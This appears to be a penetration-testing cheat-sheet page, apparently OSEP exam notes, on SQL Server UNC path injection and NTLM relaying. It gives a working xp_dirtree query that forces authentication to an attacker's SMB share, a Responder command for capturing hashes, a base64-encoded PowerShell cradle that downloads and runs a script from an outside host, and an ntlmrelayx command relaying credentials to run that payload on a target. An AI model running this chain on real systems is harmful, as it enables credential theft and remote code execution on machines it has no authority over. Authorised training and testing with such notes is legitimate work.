UNC Path Injection
Force an SQL server to connect to an SMB share we control, to subsequently grab NTLM hash to crack or use for relaying -> NTLM Relaying
Query to execute on server:
EXEC master..xp_dirtree \"\\\\192.168.119.120\\\\test\";On Kali:
sudo responder -I tap0!!!!(RESPONDER IS PROHIBITED DURING OSEP EXAM)!!!!
Example NTLM Relaying with UNC
pwsh
$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.45.242/run.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText
KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIANAAyAC8AcgB1AG4ALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA(host powershell runner -> PowerShell Runners)
Start ntlmrelayx (in this case proxychains is used)
sudo proxychains impacket-ntlmrelayx --no-http-server -smb2support -t 172.16.229.152 -c 'powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIANAAyAC8AcgB1AG4ALgB0AHgAdAAnACkAIAB8ACAASQBFAFgA'Last updated